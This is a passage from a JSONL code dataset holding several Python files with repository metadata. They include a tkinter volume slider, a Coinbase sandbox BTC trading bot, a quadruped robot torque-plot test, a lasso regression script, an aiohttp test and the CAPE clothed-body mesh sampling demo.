"os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 61, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 64, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 73, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 84, "usage_type": "attribute"}]}
+{"seq_id": "24430435501", "text": "from tkinter import Scale\r\nfrom sdl2.sdlmixer import Mix_Volume\r\n\r\n\r\nclass VolumeScale(Scale):\r\n def __init__(self, **kwargs):\r\n Scale.__init__(self, **kwargs)\r\n self.config(\r\n orient='horizontal', from_=0, to=100, bg='aqua',\r\n command=lambda v: Mix_Volume(-1, int(v))\r\n )\r\n self.set(100)\r\n self.pack(anchor='w', side='left')", "repo_name": "GojoXEnryu/CourseProject", "sub_path": "CustomAudioEditor/vscale.py", "file_name": "vscale.py", "file_ext": "py", "file_size_in_byte": 385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tkinter.Scale", "line_number": 5, "usage_type": "name"}, {"api_name": "tkinter.Scale.__init__", "line_number": 7, "usage_type": "call"}, {"api_name": "tkinter.Scale", "line_number": 7, "usage_type": "name"}, {"api_name": "sdl2.sdlmixer.Mix_Volume", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "15252276382", "text": "import websocket, json\r\nimport dateutil.parser\r\nimport cbpro\r\nfrom CoinbasePro.Keys import sandbox_b64secret, sandbox_key as key, sandbox_secret as passphrase\r\n\r\nminutes_processed = {}\r\nminute_candlesticks = []\r\ncurrent_tick = None\r\nprevious_tick = None\r\n\r\nin_position = False\r\ntest_fund = 100.0\r\n\r\nBTC_id = 'ecd6a272-670b-4453-aa19-2e9617ac2087'\r\nUSD_id = '93a22eef-7d25-43de-8f3c-cce834bd6c06'\r\n\r\n\r\ndef get_balance(id):\r\n return auth_client.get_account(id)['balance']\r\n\r\n\r\ndef three_soldiers_check():\r\n last_candle = minute_candlesticks[-2]\r\n previous_candle = minute_candlesticks[-3]\r\n first_candle = minute_candlesticks[-4]\r\n\r\n print(\"== Let's compare the last 3 candle closes ==\")\r\n if last_candle['close'] > previous_candle['close'] and previous_candle['close'] > first_candle['close']:\r\n print(\"=== Three green candlesticks in a row, let's make a trade! ===\")\r\n distance = last_candle['close'] - first_candle['open']\r\n print(\"Distance is {}\".format(distance))\r\n profit_price = last_candle['close'] + (distance * 2)\r\n print(\"I will take profit at {}\".format(profit_price))\r\n loss_price = first_candle['open']\r\n print(\"I will sell for a loss at {}\".format(loss_price))\r\n return True, profit_price, loss_price\r\n return False\r\n\r\n\r\ndef on_open(ws):\r\n print(\"Opened connection\")\r\n\r\n subscribe_message = {\r\n \"type\": \"subscribe\",\r\n \"channels\": [\r\n {\r\n \"name\": \"ticker\",\r\n \"product_ids\": [\r\n \"BTC-USD\"\r\n ]\r\n }\r\n ]\r\n }\r\n ws.send(json.dumps(subscribe_message))\r\n\r\n\r\ndef on_message(ws, message):\r\n global current_tick, previous_tick, in_position\r\n profit_price = 0\r\n loss_price = 0\r\n previous_tick = current_tick\r\n current_tick = json.loads(message)\r\n # print(message)\r\n # print(current_tick)\r\n\r\n # print(\"=== Received Tick ===\")\r\n # print(\"{} @ {}\".format(current_tick['time'], current_tick['price']))\r\n\r\n tick_datetime_object = dateutil.parser.parse(current_tick['time'])\r\n tick_dt = tick_datetime_object.strftime(\"%m/%d/%Y %H:%M\")\r\n # print(tick_datetime_object.minute)\r\n # print(tick_dt)\r\n\r\n if not tick_dt in minutes_processed:\r\n # print(\"Starting new candlestick\")\r\n minutes_processed[tick_dt] = True\r\n # print(minutes_processed)\r\n\r\n if len(minute_candlesticks) > 0:\r\n minute_candlesticks[-1]['close'] = previous_tick['price']\r\n if minute_candlesticks[-1]['open'] > minute_candlesticks[-1]['close']:\r\n minute_candlesticks[-1]['NET'] = 'Loss'\r\n elif minute_candlesticks[-1]['open'] < minute_candlesticks[-1]['close']:\r\n minute_candlesticks[-1]['NET'] = 'Profit'\r\n else:\r\n minute_candlesticks[-1]['NET'] = 'Same'\r\n\r\n minute_candlesticks.append({\r\n \"minute\": tick_dt,\r\n \"open\": current_tick['price'],\r\n \"high\": current_tick['price'],\r\n \"low\": current_tick['price']\r\n })\r\n\r\n if len(minute_candlesticks) > 0:\r\n current_candlestick = minute_candlesticks[-1]\r\n if current_tick['price'] > current_candlestick['high']:\r\n current_candlestick['high'] = current_tick['price']\r\n if current_tick['price'] < current_candlestick['low']:\r\n current_candlestick['low'] = current_tick['price']\r\n\r\n print(\"=== CandleSticks ===\")\r\n for candlestick in minute_candlesticks:\r\n print(candlestick)\r\n\r\n if len(minute_candlesticks) > 4:\r\n print(\"== There are too many candlesticks ==\")\r\n print(\"== Removing a candlesticks ==\")\r\n minute_candlesticks.pop(0)\r\n\r\n if 
len(minute_candlesticks) > 3:\r\n print(\"== There are more than 3 candlesticks, checking for pattern ==\")\r\n last_candle = minute_candlesticks[-2]\r\n previous_candle = minute_candlesticks[-3]\r\n first_candle = minute_candlesticks[-4]\r\n # print(type(last_candle['close']))\r\n\r\n print(\"== Let's compare the last 3 candle closes ==\")\r\n if float(last_candle['close']) > float(previous_candle['close']) and float(previous_candle['close']) > float(first_candle['close']):\r\n print(\"=== Three green candlesticks in a row, let's make a trade! ===\")\r\n\r\n distance = float(last_candle['close']) - float(first_candle['open'])\r\n if distance >= 0:\r\n print(\"Distance is {}\".format(distance))\r\n profit_price = float(last_candle['close']) + (distance * 2)\r\n print(\"I will take profit at {}\".format(profit_price))\r\n loss_price = float(first_candle['open'])\r\n print(\"I will sell for a loss at {}\".format(loss_price))\r\n\r\n if not in_position:\r\n print(\"== Placing order and setting in position to true\")\r\n in_position = True\r\n # place_order(profit_price, loss_price)\r\n print(\"=== PLACED ORDER ===\")\r\n auth_client.place_market_order(product_id='BTC-USD', side='buy', funds='100.0')\r\n auth_client.place_limit_order(product_id='BTC-USD', side='sell', price=profit_price, size=get_balance(BTC_id))\r\n auth_client.place_limit_order(product_id='BTC-USD', side='sell', price=loss_price, size=get_balance(BTC_id))\r\n\r\n if in_position:\r\n exit()\r\n\r\n\r\n\r\n\r\n# socket = \"wss://ws-feed.pro.coinbase.com\"\r\nsocket = 'wss://ws-feed-public.sandbox.pro.coinbase.com'\r\n\r\n###Authenticated Client###\r\nauth_client = cbpro.AuthenticatedClient(key, sandbox_b64secret, passphrase,\r\n api_url=\"https://api-public.sandbox.pro.coinbase.com\")\r\n# print(auth_client.get_account(BTC_id))\r\n# print(\"The amount of USD: {}\".format(get_balance(USD_id)))\r\n# print(\"The amount of BTC: {}\".format(get_balance(BTC_id)))\r\n# auth_client.buy(product_id='BTC-USD', order_type='market', funds='100.0')\r\n# auth_client.sell(product_id='BTC-USD', order_type='stop', funds='100.0')\r\n# print(\"The amount of USD: {}\".format(get_balance(USD_id)))\r\n# print(\"The amount of BTC: {}\".format(get_balance(BTC_id)))\r\n\r\nws = websocket.WebSocketApp(socket, on_open=on_open, on_message=on_message)\r\nws.run_forever()\r\n# wsClient = cbpro.WebsocketClient(url=socket,\r\n# products=[\"BTC-USD\"],\r\n# channels=[\"ticker\"])\r\n# wsClient.start()\r\n\r\n\r\n# print(auth_client.get_accounts())\r\n# print(get_balance(USD_id))\r\n", "repo_name": "yaz231/CoinbasePro", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 6677, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.dumps", "line_number": 54, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 69, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 69, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 69, "usage_type": "name"}, {"api_name": "cbpro.AuthenticatedClient", "line_number": 149, "usage_type": "call"}, {"api_name": "CoinbasePro.Keys.sandbox_key", "line_number": 149, "usage_type": "argument"}, {"api_name": "CoinbasePro.Keys.sandbox_b64secret", "line_number": 149, "usage_type": "argument"}, {"api_name": "CoinbasePro.Keys.sandbox_secret", "line_number": 149, "usage_type": 
"argument"}, {"api_name": "websocket.WebSocketApp", "line_number": 159, "usage_type": "call"}]}
+{"seq_id": "26820922745", "text": "from rail_real_walker import *\nfrom rail_real_walker.robots import Go1RealWalker, Go1RealWalkerRemote\nfrom rail_walker_interface import BaseWalker, BaseWalkerLocalizable, Walker3DVelocityEstimator\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nTICK_TIMESTEP = 0.03\n\ndef init_estimator() -> Walker3DVelocityEstimator:\n return DummyVelocityEstimator()\n\ndef interpolate_next_action(robot : Go1RealWalker, step : int):\n init_coefficient = (np.sin(np.pi * 2 * step / 50) + 1) / 2.0\n sit_coefficient = 1.0 - init_coefficient\n return init_coefficient * robot.joint_qpos_init + sit_coefficient * robot.joint_qpos_sitting\n\n\nif __name__ == \"__main__\":\n estimator_instance = init_estimator()\n print(\"Estimator type: \", type(estimator_instance))\n robot = Go1RealWalker(\n estimator_instance,\n power_protect_factor=0.5,\n Kp=40,\n Kd=5\n )\n \n try:\n with plt.ion():\n plt.xlim(-1, 1)\n plt.ylim(-1, 1)\n FR_thigh_arrow = plt.arrow(0, 0, 0, 0, head_width=0.05, width=0.05, color='r')\n FL_thigh_arrow = plt.arrow(0, 0, 0, 0, head_width=0.05, width=0.05, color='b')\n plt.show()\n robot.reset()\n\n input(\"Press Enter to continue...\")\n\n step = 0\n\n while True:\n robot.apply_action(interpolate_next_action(robot, step))\n robot.receive_observation()\n \n joint_torques = robot.get_joint_torques()\n joint_vels = robot.get_joint_qvel()\n FR_thigh_arrow.set_data(dx=joint_torques[1], dy=joint_vels[1])\n FL_thigh_arrow.set_data(dx=joint_torques[4], dy=joint_vels[4])\n \n plt.plot()\n plt.pause(TICK_TIMESTEP)\n step += 1\n except:\n import traceback; traceback.print_exc()\n \n finally:\n print(\"Closing...\")\n robot.close()\n estimator_instance.close()\n plt.close()\n exit(0)", "repo_name": "realquantumcookie/APRL", "sub_path": "tests/test_joint_torques.py", "file_name": "test_joint_torques.py", "file_ext": "py", "file_size_in_byte": 2012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 35, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rail_walker_interface.Walker3DVelocityEstimator", "line_number": 9, "usage_type": "name"}, {"api_name": "rail_real_walker.robots.Go1RealWalker", "line_number": 12, "usage_type": "name"}, {"api_name": "numpy.sin", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rail_real_walker.robots.Go1RealWalker", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.arrow", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.arrow", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": 
"name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}]}
+{"seq_id": "43647693112", "text": "# librerias\nimport random\nimport pandas as pd\n# from sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\n# module\nfrom src.module import (regression_lineal_lasso, graficar_resultados,\n lasso_lars, alpha_lasso_optimization)\n\n\n# cargamos la data ya limpiada\nx = pd.read_excel(\"data/cleaned.xlsx\", index_col=0)\n\ny = x[[\"FIXED_TAX\"]]\nx = x[['ACT_SQFT']]\n\n# Crear objecto scaler\n# scaler = MinMaxScaler(feature_range=(0, 1))\n# # Normalizar\n# x = scaler.fit_transform(x)\n\n# # Guardar objeto scaler\nseed = random.randint(1, 21)\n# Dividir los conjuntos de datos\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2,\n random_state=20)\n\nget_alpha = alpha_lasso_optimization(x, y)\nprint(get_alpha)\n\n# Regresión lineal por lasso\nreg_lasso, mae, coeficientes = regression_lineal_lasso(x_train,\n y_train,\n alpha=get_alpha)\nprint(coeficientes)\nprint(\"MAE\", mae)\ny_pred_lasso = reg_lasso.predict(x_test)\ngraficar_resultados(y_test, y_pred_lasso,\n titulo=f\"Resultados Regresión: LASSO, MAE: {round(mae)}\")\nprint(\"Suma de la predicción\", y_pred_lasso.sum())\nprint(\"Suma de variable real\", y_test.sum())\n\n\n# Regresión lineal por lasso lars\nreg_lars, mae, coeficientes = lasso_lars(x_train, y_train, alpha=get_alpha)\nprint(coeficientes)\ny_pred_lars = reg_lars.predict(x_test)\ngraficar_resultados(y_test, y_pred_lars,\n titulo=f\"Resultados Regresión: LASSO LARS, MAE: {round(mae)}\")\nprint(\"Suma de la predicción\", y_pred_lasso.sum())\nprint(\"Suma de variable real\", y_test.sum())\n", "repo_name": "testing-matheus/testing-al", "sub_path": "answers/4question.py", "file_name": "4question.py", "file_ext": "py", "file_size_in_byte": 1745, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_excel", "line_number": 12, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 25, "usage_type": "call"}, {"api_name": "src.module.alpha_lasso_optimization", "line_number": 28, "usage_type": "call"}, {"api_name": "src.module.regression_lineal_lasso", "line_number": 32, "usage_type": "call"}, {"api_name": "src.module.graficar_resultados", "line_number": 38, "usage_type": "call"}, {"api_name": "src.module.lasso_lars", "line_number": 45, "usage_type": "call"}, {"api_name": "src.module.graficar_resultados", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "2118876117", "text": "import unittest\nfrom aiohttp.test_utils import unittest_run_loop\nfrom ws.tests.testcase import MyHomeTestCase\n\n\nclass ApplianceTestCase(MyHomeTestCase):\n @unittest_run_loop\n async def test_get(self):\n for collection in self.app.resources.appliances:\n for appliance in self.app.resources.appliances[collection]:\n request = await self.client.request(\n \"GET\", \"/appliance/{}\".format(appliance.name.replace(\" \", \"%20\"))\n )\n assert request.status == 200\n text = await request.text()\n assert appliance.name in text\n\n @unittest_run_loop\n async def test_post(self):\n request = await self.client.request(\n \"POST\",\n \"/appliance/simple%20light\",\n data={\n \"module\": \"home.appliance.light.event.forced\",\n \"klass\": \"Event\",\n \"value\": \"Off\",\n },\n )\n assert request.status == 200\n text = await request.text()\n assert \"simple light\" in text\n assert \"Off\" in text\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "repo_name": "majamassarini/automate-ws", "sub_path": "ws/tests/test_appliance.py", "file_name": "test_appliance.py", "file_ext": "py", "file_size_in_byte": 1150, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "ws.tests.testcase.MyHomeTestCase", "line_number": 6, "usage_type": "name"}, {"api_name": "aiohttp.test_utils.unittest_run_loop", "line_number": 7, "usage_type": "name"}, {"api_name": "aiohttp.test_utils.unittest_run_loop", "line_number": 18, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "12946021098", "text": "import numpy as np\nimport copy\nimport os\nimport smplx\nimport torch\nfrom os.path import join, exists\nfrom psbody.mesh import Mesh, MeshViewer, MeshViewers\nfrom lib.utils import filter_cloth_pose\n\nnp.random.seed(123)\n\nclass demo(object):\n def __init__(self, model, name, dataset, data_dir, datadir_root, n_sample, save_obj,\n sample_option='normal', smpl_model_folder='', vis=True):\n self.n_sample = n_sample\n self.sample_option = sample_option\n self.name = name\n self.data_dir = data_dir\n self.datadir_root = datadir_root\n self.model = model\n self.dataset = dataset\n self.save_obj = save_obj\n self.vis = vis\n\n self.smpl_model = smplx.body_models.create(model_type='smpl',\n model_path=smpl_model_folder,\n gender='neutral')\n\n script_dir = os.path.dirname(os.path.realpath(__file__))\n self.clothing_verts_idx = np.load(join(script_dir, 'data', 'clothing_verts_idx.npy'))\n self.ref_mesh = Mesh(filename=join(script_dir, 'data', 'template_mesh.obj'))\n self.minimal_shape = self.ref_mesh.v\n\n self.rot = np.load(join(script_dir, 'data', 'demo_data', 'demo_pose_params.npz'))['rot'] # 216 dim pose vector\n self.pose = np.load(join(script_dir, 'data', 'demo_data', 'demo_pose_params.npz'))['pose']\n\n train_stats = np.load(join(script_dir, 'data', 'demo_data', 'trainset_stats.npz'))\n self.train_mean = train_stats['mean']\n self.train_std = train_stats['std']\n\n self.results_dir = join(script_dir, 'results', name)\n if not exists(self.results_dir):\n os.makedirs(self.results_dir)\n\n def sample_vary_pose(self):\n '''\n fix clothing type, sample sevearl poses, under each pose sample latent code N times\n '''\n full_pose = self.pose # take the corresponding full 72-dim pose params, for later reposing\n rot = filter_cloth_pose(self.rot) # only keep pose params from clo-related joints; then take one pose instance\n clotype = np.array([1, 0, 0, 0]) # one-hot clothing type label\n clotype_repeated = np.repeat(clotype[np.newaxis, :], len(rot), axis=0)\n\n # get latent embedding of the conditions\n pose_emb, clotype_emb = self.model.encode_only_condition(rot, clotype_repeated)\n clotype_emb = clotype_emb[0]\n\n obj_dir = join(self.results_dir, 'sample_vary_pose')\n\n print('\\n=============== Running demo: fix z, clotype, change pose ===============')\n print('\\nFound {} different pose, for each we generate {} samples\\n'.format(len(rot), self.n_sample))\n\n # sample latent space\n z_samples = np.random.normal(loc=0.0, scale=1.0, size=(self.n_sample, self.model.nz))\n\n for idx, pose_emb_i in enumerate(pose_emb):\n full_pose_repeated = np.repeat(full_pose[np.newaxis, idx, :], self.n_sample, axis=0)\n # concat z with conditions\n z_sample_c = np.array([np.concatenate([sample.reshape(1, -1), pose_emb_i.reshape(1, -1), clotype_emb.reshape(1, -1)], axis=1)\n for sample in z_samples]).reshape(self.n_sample, -1)\n\n predictions = self.model.decode(z_sample_c, cond=pose_emb_i.reshape(1, -1), cond2=clotype_emb.reshape(1, -1))\n predictions = predictions * self.train_std + self.train_mean\n\n # exclude head, fingers and toes\n disp_masked = np.zeros_like(predictions)\n disp_masked[:, self.clothing_verts_idx, :] = predictions[:, self.clothing_verts_idx, :]\n\n predictions_fullbody = disp_masked + self.minimal_shape\n\n predictions_fullbody_posed = self.pose_result_onepose_multisample(predictions_fullbody, full_pose_repeated, pose_idx=idx,\n save_obj=self.save_obj, obj_dir=obj_dir)\n if self.vis:\n minimal_shape_posed = 
self.pose_result_onepose_multisample(np.array([self.minimal_shape]), full_pose_repeated, pose_idx=idx,\n save_obj=False)\n self.vis_meshviewer(mesh1=predictions_fullbody_posed, mesh2=minimal_shape_posed, mesh3=None,\n n_sample=self.n_sample, titlebar='Sample vary pose')\n\n def vis_meshviewer(self, mesh1, mesh2, mesh3, n_sample, titlebar='titlebar', disp_value=False, values_to_disp=None):\n from psbody.mesh import Mesh, MeshViewer, MeshViewers\n\n if mesh3 is not None:\n viewer = MeshViewers(shape=(1, 3), titlebar=titlebar)\n for x in range(n_sample):\n viewer[0][0].static_meshes = [Mesh(mesh1[x], self.ref_mesh.f)]\n viewer[0][1].static_meshes = [Mesh(mesh2[x], self.ref_mesh.f)]\n viewer[0][2].static_meshes = [Mesh(mesh3[x], self.ref_mesh.f)]\n if disp_value is False:\n input('frame {}, Press key for next'.format(x))\n else:\n input('Current value: {}'.format(values_to_disp[x]))\n else:\n viewer = MeshViewers(shape=(1, 2), titlebar=titlebar)\n for x in range(n_sample):\n viewer[0][0].static_meshes = [Mesh(mesh1[x], self.ref_mesh.f)]\n viewer[0][1].static_meshes = [Mesh(mesh2[x], self.ref_mesh.f)]\n if disp_value is False:\n input('frame {}, press key for next'.format(x))\n else:\n input('Current value: {}'.format(values_to_disp[x]))\n\n def pose_result(self, verts, pose_params, save_obj, cloth_type=None, obj_dir=None):\n '''\n :param verts: [N, 6890, 3]\n :param pose_params: [N, 72]\n '''\n if verts.shape[0] != 1: # minimal shape: pose it to every pose\n assert verts.shape[0] == pose_params.shape[0] # otherwise the number of results should equal the number of pose identities\n\n verts_posed = []\n\n if save_obj:\n if not exists(obj_dir):\n os.makedirs(obj_dir)\n print('saving results as .obj files to {}...'.format(obj_dir))\n\n if verts.shape[0] == 1:\n self.smpl_model.v_template[:] = torch.from_numpy(verts[0])\n for i in range(len(pose_params)):\n # model.pose[:] = pose_params[i]\n self.smpl_model.body_pose[:] = torch.from_numpy(pose_params[i][3:])\n self.smpl_model.global_orient[:] = torch.from_numpy(pose_params[i][:3])\n verts_out = self.smpl_model().vertices.detach().cpu().numpy()\n verts_posed.append(verts_out)\n if save_obj:\n if cloth_type is not None:\n Mesh(verts_out.squeeze(), self.smpl_model.faces).write_obj(join(obj_dir, '{}_{:0>4d}.obj').format(cloth_type, i))\n else:\n Mesh(verts_out.squeeze(), self.smpl_model.faces).write_obj(join(obj_dir, '{:0>4d}.obj').format(i))\n else:\n for i in range(len(verts)):\n self.smpl_model.v_template[:] = torch.from_numpy(verts[i])\n self.smpl_model.body_pose[:] = torch.from_numpy(pose_params[i][3:])\n self.smpl_model.global_orient[:] = torch.from_numpy(pose_params[i][:3])\n verts_out = self.smpl_model().vertices.detach().cpu().numpy()\n verts_posed.append(verts_out)\n if save_obj:\n if cloth_type is not None:\n Mesh(verts_out.squeeze(), self.smpl_model.faces).write_obj(join(obj_dir, '{}_{:0>4d}.obj').format(cloth_type, i))\n else:\n Mesh(verts_out.squeeze(), self.smpl_model.faces).write_obj(join(obj_dir, '{:0>4d}.obj').format(i))\n\n return verts_posed\n\n def pose_result_onepose_multisample(self, verts, pose_params, pose_idx, save_obj, obj_dir=None):\n '''\n :param verts: [N, 6890, 3]\n :param pose_params: [N, 72]\n '''\n if verts.shape[0] != 1: # minimal shape: pose it to every pose\n assert verts.shape[0] == pose_params.shape[0] # otherwise the number of results should equal the number of pose identities\n\n verts_posed = []\n\n if save_obj:\n if not exists(obj_dir):\n os.makedirs(obj_dir)\n print('saving results as .obj files to 
{}...'.format(obj_dir))\n\n if verts.shape[0] == 1:\n self.smpl_model.v_template[:] = torch.from_numpy(verts[0])\n for i in range(len(pose_params)):\n self.smpl_model.body_pose[:] = torch.from_numpy(pose_params[i][3:])\n self.smpl_model.global_orient[:] = torch.from_numpy(pose_params[i][:3])\n verts_out = self.smpl_model().vertices.detach().cpu().numpy()\n verts_posed.append(verts_out)\n if save_obj:\n Mesh(verts_out, self.smpl_model.faces).write_obj(join(obj_dir, 'pose{}_{:0>4d}.obj').format(pose_idx, i))\n\n else:\n for i in range(len(verts)):\n self.smpl_model.v_template[:] = torch.from_numpy(verts[i])\n self.smpl_model.body_pose[:] = torch.from_numpy(pose_params[i][3:])\n self.smpl_model.global_orient[:] = torch.from_numpy(pose_params[i][:3])\n verts_out = self.smpl_model().vertices.detach().cpu().numpy()\n verts_posed.append(verts_out)\n if save_obj:\n Mesh(verts_out.squeeze(), self.smpl_model.faces).write_obj(join(obj_dir, 'pose{}_{:0>4d}.obj').format(pose_idx, i))\n\n return verts_posed\n\n\n def run(self):\n self.sample_vary_pose()\n\n", "repo_name": "yuxwind/CAPE", "sub_path": "demos.py", "file_name": "demos.py", "file_ext": "py", "file_size_in_byte": 9752, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.random.seed", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 10, "usage_type": "attribute"}, {"api_name": "smplx.body_models.create", "line_number": 25, "usage_type": "call"}, {"api_name": "smplx.body_models", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 43, "usage_type": "call"}, {"api_name": "lib.utils.filter_cloth_pose", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.repeat", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 69, 
"usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 84, "usage_type": "call"}, {"api_name": "psbody.mesh.MeshViewers", "line_number": 93, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 95, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 96, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 97, "usage_type": "call"}, {"api_name": "psbody.mesh.MeshViewers", "line_number": 103, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 105, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 123, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 132, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 144, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 149, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 166, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 174, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 184, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}]}
